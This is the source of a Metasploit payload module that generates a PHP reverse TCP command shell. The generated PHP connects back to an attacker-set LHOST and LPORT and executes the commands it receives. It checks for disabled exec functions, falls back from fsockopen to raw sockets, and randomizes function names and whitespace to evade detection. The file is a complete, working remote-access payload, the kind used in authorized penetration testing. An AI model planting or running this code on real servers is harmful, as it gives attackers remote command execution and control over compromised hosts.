metasploit-framework/modules/payloads/singles/php/reverse_php.rb

132 lines
3.5 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Php
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Reverse TCP (via PHP)',
'Description' => 'Reverse PHP connect back shell with checks for disabled functions',
'Author' => 'egypt',
'License' => BSD_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Issues
# - Since each command is executed in a new shell, 'cd' does nothing.
# Perhaps it should be special-cased to call chdir()
# - Tries to get around disable_functions but makes no attempts to
# circumvent safe mode.
#
def php_reverse_shell
if (!datastore['LHOST'] or datastore['LHOST'].empty?)
# datastore is empty on msfconsole startup
ipaddr = '127.0.0.1'
port = 4444
else
ipaddr = datastore['LHOST']
port = datastore['LPORT']
end
exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)
uri = "tcp://#{ipaddr}"
socket_family = "AF_INET"
if Rex::Socket.is_ipv6?(ipaddr)
uri = "tcp://[#{ipaddr}]"
socket_family = "AF_INET6"
end
shell=<<-END_OF_PHP_CODE
$ipaddr='#{ipaddr}';
$port=#{port};
#{php_preamble({:disabled_varname => "$dis"})}
if(!function_exists('#{exec_funcname}')){
function #{exec_funcname}($c){
global $dis;
#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("#{uri}",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=#{exec_funcname}(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=#{exec_funcname}(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}
END_OF_PHP_CODE
# randomize the spaces a bit
Rex::Text.randomize_space(shell)
return shell
end
#
# Constructs the payload
#
def generate
return super + php_reverse_shell
end
end